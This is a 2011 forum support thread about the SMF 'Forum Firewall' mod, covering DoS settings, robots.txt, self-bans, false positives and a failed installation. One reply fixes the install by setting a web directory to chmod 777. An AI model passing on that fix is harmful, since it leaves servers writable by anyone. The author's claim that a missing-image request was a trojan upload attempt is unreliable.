Read this link on how (http://www.simplemachines.org/community/index.php?topic=417490.msg3111015#msg3111015).

Quote from: MiY4Gi on August 05, 2011, 05:12:09 PM
Also, is it possible to add an option in the firewall to block any users that browse too quickly or use excessive traffic in a short time?

It is there already it is called the dos attack.  Set the trigger and cache to above 20 and it will take cars of them.  Whatever you do, do not go too low.
;)
Title: Re: Forum Firewall
Post by: butchs on August 06, 2011, 07:37:53 AM
This is so safe it is absurd!  You set-up your robots files as per the link (http://www.simplemachines.org/community/index.php?topic=417490.msg3111015#msg3111015).  Go to google, yahoo and bing's webmaster pages and test the robots file to make sure all the good bots obey.  Then turn on the Validation then all those sneaky bots who have been pretending to be someone else, ripping through your site doing sucking up bandwidth, trying to log in and etc will get blocked and go elsewhere.  You will be left with just the good bots.
O:)

When I tested (http://www.simplemachines.org/community/index.php?topic=417490.msg3098829#msg3098829) this feature.  I had a few thousand google, bing and yahoo blocks in one day.  A constant hum of 20,000 bits per second 24 hours per day was gone!  I went to the webmasters site and they recoded no blocks.  Proving that the mod removed just the weeds.
8)
Title: Re: Forum Firewall
Post by: MiY4Gi on August 06, 2011, 10:36:53 AM
I use PortaMx SEF (like Pretty URLs), and have already modified my robots.txt file to reflect that. So will the following also work in the Firewall's "Robots.txt action's" space? I don't have any "actions" in my URL anymore, except for action=admin.

/attachments/|/avatars/|/avt/|/cache/|/editor_uploads/|/fckeditor/|/Packages/|/Smileys/|/Sources/|/Themes/|/videos/|/activate/|/arcade/|/calendar/|/collapse/|/credits/|/help/|action=admin

Title: Re: Forum Firewall
Post by: butchs on August 06, 2011, 11:17:02 AM
Mp As per the build in help "?":

Action array values must be entered in the format of "XX|YY" where XX and YY are the Entity. ie "action=activate|action=admin".

It will not test directory searches.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 06, 2011, 01:05:39 PM
Quote from: butchs on August 06, 2011, 11:17:02 AM
Mp As per the build in help "?":

Huh?

Quote from: butchs on August 06, 2011, 11:17:02 AM
Action array values must be entered in the format of "XX|YY" where XX and YY are the Entity. ie "action=activate|action=admin".

It will not test directory searches.

Will you support directories in a future release?
Title: Re: Forum Firewall
Post by: butchs on August 06, 2011, 02:00:35 PM
The mod has built in help.  Click on the (http://modeltugforum.com/Themes/default/images/helptopics.gif) icon.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 06, 2011, 04:06:45 PM
Quote from: butchs on August 06, 2011, 02:00:35 PM
The mod has built in help.  Click on the (http://modeltugforum.com/Themes/default/images/helptopics.gif) icon.

I know that, but like I said, my forum doesn't have "actions" anymore. So, could you maybe include directories as well as actions, and implement it in a future release? Or, is there some code I can change?
Title: Re: Forum Firewall
Post by: butchs on August 06, 2011, 09:45:45 PM
Sorry...  I have no plans for directories.  My opinion is it is not needed.  The requested test will just cause me hours of wasted time with no benefits.

FYI - Every release of SMF has the action array.  Look at index.php!   :-\
Title: Re: Forum Firewall
Post by: Alex' Manson on August 07, 2011, 06:31:16 AM
Quote from: MiY4Gi on August 05, 2011, 05:12:09 PM
What does the setting "Robots.txt action's" do?

What I want is to block any bots/crawlers that disobey my robots.txt file. Does this setting do that?

Also, is it possible to add an option in the firewall to block any users that browse too quickly or use excessive traffic in a short time?
yes the bot will block any bot (except the one's in the whitelist) that will not follow your robots.txt.
and users that browse too quickly are also banned because of "DDOS" attacking.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 07, 2011, 08:12:13 AM
Quote from: butchs on August 06, 2011, 09:45:45 PM
Sorry...  I have no plans for directories.  My opinion is it is not needed.  The requested test will just cause me hours of wasted time with no benefits.

I see. I guess one thing I could do is to change some of the SEF URL's back to the standard actions, then block them using robots.txt. Blocking action=help and action=search might be all that's needed since their URL's appear in every pages header, so most bots would probably crawl them.

Are there any other mods that prevent spoofing?

Quote from: butchs on August 06, 2011, 09:45:45 PM
FYI - Every release of SMF has the action array.  Look at index.php!   :-\

Yes, but what I meant was that my URL's don't have "action" in them anymore. All my webpages look like directories now (eg. http://simplemachines.org/1/forum-firewall/ Versus http://www.simplemachines.org/community/index.php?action=post;msg=3129239;topic=417490.520)

Alright, so I blocked myself yesterday by entering my admin password wrong, and well, I also logged out and refreshed my admin page which probably also contributed to the block. Now I already disabled the Firewall using phpMyAdmin, so I got website access, but how do I remove the block from the firewall?

Edit: I think I unblocked myself. What I did was change the ban duration to Never, then saved, then reloaded the page, then changed it back to Permanent, then enabled Testing, and I still have website access. I guess it worked then.
Title: Re: Forum Firewall
Post by: butchs on August 07, 2011, 09:41:11 AM
Quote from: MiY4Gi on August 07, 2011, 08:12:13 AM
Are there any other mods that prevent spoofing?

Though not 100% effective, Bad Behavior (http://custom.simplemachines.org/mods/index.php?mod=2502) (BB) has some basic tests for good bots.  With Search Engine DNS enabled it can catch some of the more tricky ones (Some servers such as Ubuntu 10.04 will not work.  It works fine with many other servers such as my host).  With Search Engine DNS disabled BB will go through an ip range test for good bot spoofing.  Like I said before if the spoof is well done it will still pass the both BB tests.

Quote from: MiY4Gi on August 07, 2011, 08:12:13 AM
Yes, but what I meant was that my URL's don't have "action" in them anymore. All my webpages look like directories now (eg. http://simplemachines.org/1/forum-firewall/ Versus http://www.simplemachines.org/community/index.php?action=post;msg=3129239;topic=417490.520)

Readers please note that we are not supporting the default SMF installation and these questions are not what you should expect to see at your site since they are for a modified site.

Unless you rewrite SMF, I would still believe if you type action=search you will still search.  I see no reason not to have them all in your robots... as the bad bots will still try to access action='s.

Quote from: MiY4Gi on August 07, 2011, 08:12:13 AM
Alright, so I blocked myself yesterday by entering my admin password wrong, and well, I also logged out and refreshed my admin page which probably also contributed to the block. Now I already disabled the Firewall using phpMyAdmin, so I got website access, but how do I remove the block from the firewall?
... 
Edit: I think I unblocked myself. What I did was change the ban duration to Never, then saved, then reloaded the page, then changed it back to Permanent, then enabled Testing, and I still have website access. I guess it worked then

What you did will not work.  You can not ban your self with this mod if you are the admin.  The only way for the admin to get blocked by the mod is with incorrect settings in bypass protection.  Your bypass protection may be incorrect.  Check out the bypass protection post (http://www.simplemachines.org/community/index.php?topic=417490.msg3123695#msg3123695).
Title: Re: Forum Firewall
Post by: MiY4Gi on August 07, 2011, 11:32:20 AM
I've disabled IP validation, since I may need to login to my admin account from elsewhere.

And yes, I DID ban myself. I logged out since I wanted to see what guests would see, but I didn't close the tab at the admin URL. Then while logged out, I refreshed my admin tab, which probably triggered my firewall, but it didn't block me yet, then when the admin section prompted me to enter my password, I entered it incorrectly, then the firewall blocked me.

You say that what I did won't remove my IP from the block list, but then why do I have access to my website again, even with the firewall enabled?
Title: Re: Forum Firewall
Post by: butchs on August 07, 2011, 11:53:35 AM
Luck???   :o
Title: Re: Forum Firewall
Post by: MiY4Gi on August 07, 2011, 12:22:36 PM
Quote from: butchs on August 07, 2011, 11:53:35 AM
Luck???   :o

:D

Let's be serious now. Say now I do block myself, then how do I unblock myself?
Title: Re: Forum Firewall
Post by: butchs on August 07, 2011, 12:32:54 PM
Sigh.  ???   If you made an error read this post (http://www.simplemachines.org/community/index.php?topic=417490.msg2930255;topicseen#msg2930255) to correct access.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 07, 2011, 12:43:40 PM
Okay, when I do that, does the Firewall reset itself and delete any IP's that were blocked?
Title: Re: Forum Firewall
Post by: butchs on August 07, 2011, 12:48:39 PM
Turning off the mod does not remove any settings.  Another way to turn off the mod is by uninstalling and reinstalling it in package manager.  If done, all settings will remain except the mod will be turned off.

The mod only blocks addresses for a short time as specified by the cache settings.  If the cache setting is set to zero it blocks per click.

The mod does not ban any ip's.  It sends all banned ip's to SMF.  All banned ip's are handled via SMF.

Title: Re: Forum Firewall
Post by: MiY4Gi on August 07, 2011, 01:38:31 PM
Quote from: butchs on August 07, 2011, 12:48:39 PM
Turning off the mod does not remove any settings.  Another way to turn off the mod is by uninstalling and reinstalling it in package manager.  If done, all settings will remain except the mod will be turned off.

The mod only blocks addresses for a short time as specified by the cache settings.  If the cache setting is set to zero it blocks per click.

The mod does not ban any ip's.  It sends all banned ip's to SMF.  All banned ip's are handled via SMF.

I see. So what happens when I set the Longterm Ban to Permanent, and I get myself banned? Does SMF remember my Ban?
Title: Re: Forum Firewall
Post by: butchs on August 07, 2011, 01:51:03 PM
BANNING INFO

The mod is designed to protect you from banning yourself.  But it can only be idiot proof to a point.  :laugh:  You can get banned by the mod if you are not logged in as the admin.

The mod sends the ban information to SMF's built in banning system.  So you will have to edit "smf_ban_groups" and/ or "smf_ban_items" via phpmyadmin.  Questions on how to use and/ or modify SMF's banning system is outside of the scope of this support topic.   :-X

I do not recommend setting "Ban to Permanent".  Either 1 or 24 hours is all you need.  Anymore will be a waste of database space.
8)
Title: Re: Forum Firewall
Post by: MiY4Gi on August 07, 2011, 04:34:18 PM
Quote from: butchs on August 07, 2011, 01:51:03 PM
I do not recommend setting "Ban to Permanent".  Either 1 or 24 hours is all you need.  Anymore will be a waste of database space.
8)

Thanks, I didn't realize that. I changed it now to 24 hours.

What does this mean:

_____________________

466   

41.177.21.151   

2011-08-07 22:34:34   

GET /Themes/Ambassador_20/images/theme/frame_repeat.png HTTP/1.1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1 http://theanimeclub.co.za/

Hack: Themes/!

_____________________

467   

41.177.21.151   

2011-08-07 22:34:37   

GET /31/icon-2011/msg68/ HTTP/1.1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1 http://theanimeclub.co.za/   

Hack: Repeated!
______________________

I keeps producing infractions when I browse as a guest.
Title: Re: Forum Firewall
Post by: butchs on August 07, 2011, 06:57:57 PM
Oh geese, I forgot...   :o  My bad! :-[  I have some major directories in the "injection list".  :-*

The first block is when visitor tried to download, directly copy or edit a file that was contained in your "theme" directory.  The second block is the cache.  Once blocked the visitor will continue to be blocked no matter what they do, until the cache (recommended min 20 seconds) expires.  This feature is meant to slow down fast bots.
:)

If your site is just directories you need to delete them form the "injection list".  The mod was created for default SMF urls.  Your weird urls you are using are custom and will require you to make edits to the default FF settings.  It is my opinion they will reduce your security.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 08, 2011, 12:45:17 AM
Don't you NEED to download images and stuff from the theme's directory to browse? I mean, how else would smiley's appear in your browser? Or could there be something wrong with my /Themes/Ambassador_20/images/theme/frame_repeat.png file that keeps making the firewall trigger? 

Also, why is /robots.txt in the injection list? Doesn't this prevent search engine crawlers from reading the robots.txt file?
Title: Re: Forum Firewall
Post by: MiY4Gi on August 08, 2011, 03:25:07 AM
Strange. There is no frame_repeat.png file at that location. However, the file is referenced in a css file. The firewall probably treated the attempt to download the file as an attempt to create it instead. For now, I created a new empty file named frame_repeat.png and placed it in /Themes/Ambassador_20/images/theme/. Hopefully that will fix that particular problem.

Now I should contact the theme creator to find out why that file was missing.

Will the firewall block all downloads of missing files that are referenced in css or php files?
Title: Re: Forum Firewall
Post by: butchs on August 08, 2011, 05:17:08 AM
Quote from: MiY4Gi on August 08, 2011, 12:45:17 AM
Don't you NEED to download images and stuff from the theme's directory to browse? I mean, how else would smiley's appear in your browser? Or could there be something wrong with my /Themes/Ambassador_20/images/theme/frame_repeat.png file that keeps making the firewall trigger? 

Also, why is /robots.txt in the injection list? Doesn't this prevent search engine crawlers from reading the robots.txt file?

No.  Someone tried to add a trojan file that was not there.  FF blocked it.
Title: Re: Forum Firewall
Post by: butchs on August 08, 2011, 05:19:06 AM
Quote from: MiY4Gi on August 08, 2011, 03:25:07 AM
Will the firewall block all downloads of missing files that are referenced in css or php files?

No
Title: Re: Forum Firewall
Post by: Valitkonis on August 08, 2011, 09:33:01 AM
Hello, i have problem with Forum firewall on version 2.0.
I downloaded it from there: http://custom.simplemachines.org/mods/index.php?mod=2815
and when i installing this mod i have much errors, someone can explain how correct install this mod?
Title: Re: Forum Firewall
Post by: MiY4Gi on August 08, 2011, 09:41:31 AM
Quote from: Valitkonis on August 08, 2011, 09:33:01 AM
Hello, i have problem with Forum firewall on version 2.0.
I downloaded it from there: http://custom.simplemachines.org/mods/index.php?mod=2815
and when i installing this mod i have much errors, someone can explain how correct install this mod?

What mods do you have installed?

How many errors are you talking about?

For a few errors you'll just have to make manual edits to the files that "contain" errors. If there are too many errors, then it might be easier to see what's causing those errors (most likely one or a few mods with sloppy coding), then remove the culprit.
Title: Re: Forum Firewall
Post by: Valitkonis on August 08, 2011, 10:56:04 AM
When i trying install mod i see this errors:

There was a problem with the package we will develop at least one error in the continuing modifications during the installation. Highly recommended not to continue the installation unless you know what you&#39;re doing and you make a very recent backup. This error could occur because of your deployable package, and installed the package already existing conflict, problem with the package, the package requires another package installed, which you do not already have; package created by another version of SMF.

1.    Extract File    ./Sources/ForumFirewall.php    
   2.    Extract File    ./Sources/Subs-ForumFirewall.php    
   3.    Extract File    ./Sources/Subs-ForumFirewallScan.php    
   4.    Extract File    ./Sources/ForumFirewall-Admin.php    
   5.    Extract File    ./Themes/default/ForumFirewall_Admin.template.php    
   6.    Extract File    ./Themes/default/languages/ForumFirewall.english.php    
   7.    Extract File    ./Themes/default/languages/ForumFirewall.english-utf8.php    
   8.    Extract File    ./Themes/default/languages/ForumFirewall.spanish_es.php    
   9.    Extract File    ./Themes/default/languages/ForumFirewall.spanish_es-utf8.php    
   10.    Extract File    ./Themes/default/languages/ForumFirewall.spanish_latin.php    
   11.    Extract File    ./Themes/default/languages/ForumFirewall.portuguese_brazilian.php    
   12.    Extract File    ./Themes/default/languages/ForumFirewall.portuguese_brazilian-utf8.php    
   13.    Extract File    ./Themes/default/languages/ForumFirewall.portuguese_pt.php    
   14.    Extract File    ./Themes/default/languages/ForumFirewall.portuguese_pt-utf8.php    
   15.    Extract File    ./Themes/default/languages/ff_firewall.english.php    
   16.    Extract File    ./Themes/default/languages/ff_firewall.english-utf8.php    
   17.    Extract File    ./Themes/default/languages/ff_firewall.spanish_es.php    
   18.    Extract File    ./Themes/default/languages/ff_firewall.spanish_es-utf8.php    
   19.    Extract File    ./Themes/default/languages/ff_firewall.spanish_latin.php    
   20.    Extract File    ./Themes/default/languages/ff_firewall.portuguese_brazilian.php    
   21.    Extract File    ./Themes/default/languages/ff_firewall.portuguese_brazilian-utf8.php    
   22.    Extract File    ./Themes/default/languages/ff_firewall.portuguese_pt.php    
   23.    Extract File    ./Themes/default/languages/ff_firewall.portuguese_pt-utf8.php    
   24.    Extract File    ./Themes/default/css//forumfirewall.css    
   25.    Extract File    ./ff_firewall.php    
   26.    Extract Tree    ./ffcache    
   27.    Execute Modification    ForumFirewall.xml    Modifications to the grammatical error
   28.    Execute Modification    ForumFirewall.xml    Modifications to the grammatical error
   29.    Execute Modification    modification_language.xml    Modifications to the grammatical error
   30.    Execute Modification    modification_language.xml    Modifications to the grammatical error
   31.    Execute Modification    modification_language_2x.xml    Modifications to the grammatical error
   32.    Execute Modification    modification_language_2x.xml    Modifications to the grammatical error



how i can fix it, and make success mod?
Title: Re: Forum Firewall
Post by: MiY4Gi on August 08, 2011, 11:44:26 AM
Which of the above steps give the errors? Are you talking about "Modifications to the grammatical error" in steps 27-32.
Title: Re: Forum Firewall
Post by: Valitkonis on August 08, 2011, 11:50:23 AM
When i trying to click on Finish Installation in screen i see fatal error:

Fatal error: require() [function.require]: Failed opening required '/home/name/domains/fgf.lt/public_html/Packages/temp/./install_db.php' (include_path='.:/usr/local/lib/php') in /home/valitkoni6/domains/lgyvenimas.lt/public_html/Sources/Packages.php on line 951
Title: Re: Forum Firewall
Post by: butchs on August 08, 2011, 06:00:27 PM
Assuming you have the latest version of the mod and are using SMF gold I looked up the code in package.php:

require($boarddir . '/Packages/temp/' . $context['base_path'] . $action['filename']);

The error your getting is not the fault of this mod.  It is because your server setup is a foul.  Either your packages directory isn't writeable by the server or, a temp folder wasn't created, or the package wasn't extracted properly.  You can manually extract install_db.php to your root SMF folder and manually navigate to it in your browser and that will add the necessary settings.


PS:  Thank  MiY4Gi for getting is close to a solution.   Thanks SlammedDime (http://www.simplemachines.org/community/index.php?topic=352351.msg3090412#msg3090412) for the detailed explanation...
Title: Re: Forum Firewall
Post by: MiY4Gi on August 08, 2011, 07:07:39 PM
Or he didn't download the package properly (i.e. corrupted archive).  ;)

No, problem. Before one can find a solution to a problem, he must first obtain as much information about the problem as possible. That is the engineering way.  :D
Title: Re: Forum Firewall
Post by: esttecb on August 08, 2011, 07:40:56 PM
I just installed this mod on my SMF 2.0, I clicked on the "http://www.eastcoastrollingthunder.com/" link at my forum bottom, this is what I got:

You typed: http://www.eastcoastrollingthunder.com / and have a 403 error.
Bad bad boy! You know this page if forbidden so go home!

Click here to come back to where you belong!

For more information, please contact: admin~n0spam[at]n0spam~eastcoastrollingthunder~[d0t]~com

I'm guessing it has something to do with the referrer protection (I'm assuming you have this mod installed on your forum), so I would like to know if people will get the same message if they try to enter (to my forum) from sites (forums, blogs, etc) linking to my forum.
Title: Re: Forum Firewall
Post by: butchs on August 08, 2011, 07:55:12 PM
Naw, that is not from the mod.  Looks like my htaccess file.  I block many counties but the USA and whatever crawlprotect (http://community.smfhelper.info/index.php?topic=5222.0) does...
???
Title: Re: Forum Firewall
Post by: MiY4Gi on August 08, 2011, 08:20:33 PM
Yeah, I'm also blocked from your site, but it doesn't really bother me.

Say butchs, have you ever considered using a htaccess whitelist instead of a blacklist? I've read a bit about it and only heard good things about it. It's more restrictive than a blacklist though, but it keeps your htaccess file a lot smaller.
Title: Re: Forum Firewall
Post by: butchs on August 09, 2011, 05:23:27 AM
I guess I am rude.  ;) Will need to read into it...
Title: Re: Forum Firewall
Post by: Valitkonis on August 09, 2011, 06:43:22 AM
Quote from: butchs on August 08, 2011, 06:00:27 PM
Assuming you have the latest version of the mod and are using SMF gold I looked up the code in package.php:

require($boarddir . '/Packages/temp/' . $context['base_path'] . $action['filename']);

The error your getting is not the fault of this mod.  It is because your server setup is a foul.  Either your packages directory isn't writeable by the server or, a temp folder wasn't created, or the package wasn't extracted properly.  You can manually extract install_db.php to your root SMF folder and manually navigate to it in your browser and that will add the necessary settings.


PS:  Thank  MiY4Gi for getting is close to a solution.   Thanks SlammedDime (http://www.simplemachines.org/community/index.php?topic=352351.msg3090412#msg3090412) for the detailed explanation...

I dont understand, how i can do it manually? what folder open, what write? can you complete say it
Title: Re: Forum Firewall
Post by: Alex' Manson on August 09, 2011, 06:53:48 AM
if you don't know how to put the install_db.php file (in the package) into your FTP, then.. go do something more easier and learn first.


But, meh i will explain -.-'
Open your FTP, (again if you don't know what's this, move on.. and do something easier in your life) Go to your "Public_html" folder, now, go back to your PC, open the package you downloaded, you will see a file called install_db.php, put it in the ftp and let it upload, now access it by entering Yoursite.com/install_db.php
make sure the files are set with the right permissions, and if you don't know what permissions mean, read the text between the () in the beginning of the post.
Tata.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 09, 2011, 07:48:06 AM
@ Valitkonis Who's hosting your website?
Title: Re: Forum Firewall
Post by: MiY4Gi on August 09, 2011, 09:27:20 AM
Quote from: butchs on August 05, 2011, 08:08:27 PM
It is there already it is called the dos attack.  Set the trigger and cache to above 20 and it will take cars of them.  Whatever you do, do not go too low.
;)

What's better for stopping bots? Should my cache duration be higher or lower? Should my trigger be higher or lower? What are the upper and lower limits of the cache duration and trigger?

Can't I set my cache duration to 5min? Or is that a bad idea? Some of my bot spoofers only get blocked once every 2-5 mins, but never get banned since they never reach the trigger. Or does Robot.txt Validation ban spoofers instantly?
Title: Re: Forum Firewall
Post by: Valitkonis on August 09, 2011, 01:33:03 PM
Quote from: Sisko Punk on August 09, 2011, 06:53:48 AM
if you don't know how to put the install_db.php file (in the package) into your FTP, then.. go do something more easier and learn first.


But, meh i will explain -.-'
Open your FTP, (again if you don't know what's this, move on.. and do something easier in your life) Go to your "Public_html" folder, now, go back to your PC, open the package you downloaded, you will see a file called install_db.php, put it in the ftp and let it upload, now access it by entering Yoursite.com/install_db.php
make sure the files are set with the right permissions, and if you don't know what permissions mean, read the text between the () in the beginning of the post.
Tata.

I do all what u say, and i stopped on: "Now access it by entering yoursite.com/install_db.php make sure the files are set with the right permissions, and if you dont know what permission mean read the text between the () in the beginning of the post."

when i writing : yoursite.com/install_db.php i see this:
Data Base error
Table 'smf_log_forumfirewall' already exists
File: /home/name/domains/lgyvenimas.lt/public_html/install_db.php
Line: 223
Back
Title: Re: Forum Firewall
Post by: MiY4Gi on August 09, 2011, 02:34:13 PM
I don't think you can simply replace database entries. However, this doesn't make sense. If your install_db.php file couldn't be opened, then how did the firewall database entries get added to your database? Well, if the entries are there, then I reckon the mod should work. 

Have you checked your forum to see if the mod is working?

Also, who's hosting your website? Who runs your server?

Quote from: Valitkonis on August 08, 2011, 11:50:23 AM
When i trying to click on Finish Installation in screen i see fatal error:

Fatal error: require() [function.require]: Failed opening required '/home/name/domains/fgf.lt/public_html/Packages/temp/./install_db.php' (include_path='.:/usr/local/lib/php') in /home/valitkoni6/domains/lgyvenimas.lt/public_html/Sources/Packages.php on line 951

I think the culprit was that period/folder in /public_html/Packages/temp/./install_db.php

Can anyone confirm whether that period/folder is supposed to be there? Doesn't install_db.php launch from temp/ and not temp/./?
Title: Re: Forum Firewall
Post by: Valitkonis on August 09, 2011, 03:21:35 PM
my hoster is: ipp.lt and hostex.lt
Title: Re: Forum Firewall
Post by: MiY4Gi on August 09, 2011, 03:37:15 PM
Quote from: Valitkonis on August 09, 2011, 03:21:35 PM
my hoster is: ipp.lt and hostex.lt

Shared hosting?

Tell me, does your forum say that Forum Firewall is installed? Or is your forum exactly the same as it was before you installed the mod? Check to see if Forum Firewall is under Admin > Configuration.
Title: Re: Forum Firewall
Post by: Valitkonis on August 09, 2011, 05:06:14 PM
no i dont see there firewall, i just need install it but dont know how.. because i say in earler post what error i getting when installing it
Title: Re: Forum Firewall
Post by: butchs on August 09, 2011, 05:33:40 PM
Quote from: Valitkonis on August 09, 2011, 01:33:03 PM
when i writing : yoursite.com/install_db.php i see this:
Data Base error
Table 'smf_log_forumfirewall' already exists
File: /home/name/domains/lgyvenimas.lt/public_html/install_db.php
Line: 223
Back

Sounds like the db is there already.  Try installing everything without running install_db.php.
Title: Re: Forum Firewall
Post by: butchs on August 09, 2011, 07:02:55 PM
Quote from: MiY4Gi on August 09, 2011, 09:27:20 AM
What's better for stopping bots? Should my cache duration be higher or lower? Should my trigger be higher or lower? What are the upper and lower limits of the cache duration and trigger?

Can't I set my cache duration to 5min? Or is that a bad idea? Some of my bot spoofers only get blocked once every 2-5 mins, but never get banned since they never reach the trigger. Or does Robot.txt Validation ban spoofers instantly?

ADJUSTING DOS PROTECTION HELP

The cache feature was designed to reduce the amount of checks the mod makes when testing a user for large forums.  This feature can make your site faster because it will send the bots packing before SMF fully loads (ie page images/ icons).  For example, if a bad guy hits your site FF will test it the first time.  If the bad guy is blocked the mod will forgo testing and block the bad guy the remaining duration of the cache set point.  The same is true if a regular member comes to the forum.  The member will not be tested again the duration of the cache set point.

If you have cpanel or some other way of tracking the latest visitors, you can look at visitor ip records.   Typically you like to set this to half the average duration of a bad bot visits.  In most cases 20 to 30 seconds.  As a minimum you will like to test a bot two times a visit.  Some people prefer three to four times.  Do not go less than 20 seconds.

The Trigger is the number Number of violations per cache period before the visitor is blocked.  If you take the cache duration and multiply it by the trigger that will give you the total hits over the cache duration. Lowering it will cause it to be more restrictive.  Raising the attack trigger will make it less restrictive.

Looking at your  latest visitors in cpanel will assist you in determining the trigger.  It is recommended to compare your setting with the default settings ie 13 hits for every 20 seconds.  To make sure you do not go too low.
Title: Re: Forum Firewall
Post by: Valitkonis on August 10, 2011, 07:40:59 AM
I have a same problem there and still cant install Firewall, because after i tryng install i gettin Fatall error...Maybe someone know how to install or someone can do it on Teamweaver?
Title: Re: Forum Firewall
Post by: Alex' Manson on August 10, 2011, 07:53:44 AM
Quote from: Valitkonis on August 10, 2011, 07:40:59 AM
I have a same problem there and still cant install Firewall, because after i tryng install i gettin Fatall error...Maybe someone know how to install or someone can do it on Teamweaver?
he already replied, simply do the manual edits again (if you find some edits are already done, skip them) and if you see duplicate edits, remove one.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 10, 2011, 08:33:26 AM
Quote from: butchs on August 09, 2011, 07:02:55 PM
ADJUSTING DOS PROTECTION

  • If you have not done so you should update your robots.txt file to be similar to [nofollow] http://www.veign.com/blog/2007/10/06/robots-txt-file-for-an-smf-forum/ [/nofollow].
  • Make sure you add a Crawl-delay (number of seconds between hits) to the end of robots.txt for all the bots that use it (except Google).
  • You should also visit [nofollow] http://www.google.com/support/webmasters/ [/nofollow] and set up the crawl rate.

The cache feature was designed to reduce the amount of checks the mod makes when testing a user for large forums.  This feature can make your site faster because it will send the bots packing before SMF fully loads (ie page images/ icons).  For example, if a bad guy hits your site FF will test it the first time.  If the bad guy is blocked the mod will forgo testing and block the bad guy the remaining duration of the cache set point.  The same is true if a regular member comes to the forum.  The member will not be tested again the duration of the cache set point.

If you have cpanel or some other way of tracking the latest visitors, you can look at visitor ip records.   Typically you like to set this to half the average duration of a bad bot visits.  In most cases 20 to 30 seconds.  As a minimum you will like to test a bot two times a visit.  Some people prefer three to four times.  Do not go less than 20 seconds.

The Trigger is the number Number of violations per cache period before the visitor is blocked.  If you take the cache duration and multiply it by the trigger that will give you the total hits over the cache duration. Lowering it will cause it to be more restrictive.  Raising the attack trigger will make it less restrictive.

Looking at your  latest visitors in cpanel will assist you in determining the trigger.  It is recommended to compare your setting with the default settings ie 13 hits for every 20 seconds.  To make sure you do not go too low.

When you say hits, are you referring to violations or normal browsing? What settings block bots for browsing too quickly? Also, how do I automatically ban bots/IP's that are blocked more than once?
Title: Re: Forum Firewall
Post by: Valitkonis on August 10, 2011, 09:17:26 AM
Quote from: Sisko Punk on August 10, 2011, 07:53:44 AM
Quote from: Valitkonis on August 10, 2011, 07:40:59 AM
I have a same problem there and still cant install Firewall, because after i tryng install i gettin Fatall error...Maybe someone know how to install or someone can do it on Teamweaver?
he already replied, simply do the manual edits again (if you find some edits are already done, skip them) and if you see duplicate edits, remove one.

what exactly edits i need to to?
Title: Re: Forum Firewall
Post by: MiY4Gi on August 10, 2011, 09:43:06 AM
Quote from: Valitkonis on August 10, 2011, 09:17:26 AM
what exactly edits i need to to?

Check the folder at /public_html/Packages/ and tell me if you see a temp folder.

This might work:

Unzip the Forum Firewall package, delete install_db.php and uninstall_db.php, then zip the file again. Now, try to install using this new package.
Title: Re: Forum Firewall
Post by: Valitkonis on August 10, 2011, 09:57:58 AM
Yes i got temp folder but he are empty.

i do all what you say and i have same thing i getting "Fatall error"

Fatal error: require() [function.require]: Failed opening required '/home/name/domains/lgyvenimas.lt/public_html/Packages/temp/ForumFirewall 1.1.3/install_db.php' (include_path='.:/usr/local/lib/php') in /home/name/domains/lgyvenimas.lt/public_html/Sources/Packages.php on line 951
Title: Re: Forum Firewall
Post by: MiY4Gi on August 10, 2011, 11:24:10 AM
Mm, it seems that install_db.php is a required file for any mod installation.

Extract uninstall_db.php from the original Forum Firewall package, then run it, just like you did with install_db.php. That should remove all firewall entries from your database.

Delete that temp folder in /Packages.

Now, try to install the original firewall package again.

What other mods have you installed on your forum?
Title: Re: Forum Firewall
Post by: Alex' Manson on August 10, 2011, 01:44:06 PM
i found a solution.

keep the package as it is.
create a temp folder in the "Packages" directory and chmod it to 777.
click install.. now it will show you the tests, if everything is okay, go to "packages" again, delete temp, re make another one, chmod to 777 and press install now (the second one) and it should work
it's a server issue. ;)
Title: Re: Forum Firewall
Post by: Valitkonis on August 10, 2011, 02:15:50 PM
Sisko thank you very much finally i finished installing it TY!!
Title: Re: Forum Firewall
Post by: Alex' Manson on August 10, 2011, 06:06:31 PM
No problem :)
Title: Re: Forum Firewall
Post by: butchs on August 10, 2011, 07:11:42 PM
Thanks for the help!   :)

Quote from: MiY4Gi on August 10, 2011, 08:33:26 AM
When you say hits, are you referring to violations or normal browsing? What settings block bots for browsing too quickly? Also, how do I automatically ban bots/IP's that are blocked more than once?

hits = normal browsing from a bot
settings  block bots for browsing too quickly = DOS PROTECTION = DOS Attack + Trigger + Longterm Ban + cache.
how do I automatically ban bots/IP's that are blocked more than once = short term - cache = longterm - manually via SMF.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 11, 2011, 06:39:47 AM
Alright, I assume hits the total number of pages loaded, and not the total number of files downloaded (i.e. HTTP server requests) per page.

Mm, I got my trigger set to 0.4, and cache set to 99, so does this mean that users who browse 39 pages in 99s (i.e. 0.4*99 = 39.6) will get a longterm ban (or just blocked)?

How low can I set the trigger? Can I set it to 0.2 because 39 pages in 99s is very high. No human will browse more than 20 pages in a 1.5min, even if they open multiple tabs.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 11, 2011, 12:43:19 PM
Yaaaaay! I blocked my first DOS attack. The IP was Keep Alive, and they were attacking my Profile and Register URL's.

I wonder what they were hoping to do.
Title: Re: Forum Firewall
Post by: butchs on August 11, 2011, 06:25:54 PM
Other things can cause a url.  I thing your trigger is too low.  Longterm Ban should be really now or never at that setting.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 11, 2011, 06:44:09 PM
Quote from: butchs on August 11, 2011, 06:25:54 PM
Other things can cause a url.  I thing your trigger is too low.  Longterm Ban should be really now or never at that setting.

I don't understand what you mean.
Title: Re: Forum Firewall
Post by: infoseeker on August 12, 2011, 04:35:46 AM
Thank you very much butchs
This is the BEST&GREATEST mod for every SMF user.

Thanks a lot for securing us from Hackers.

To protect my forum's personal content from robots iam resettins my robots.txt as below. Please tell me if its not better. And suggest me for good robots.txt file.


User-agent: *

Disallow: /smf/index.php?action=activate
Disallow: /smf/index.php?action=admin

Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
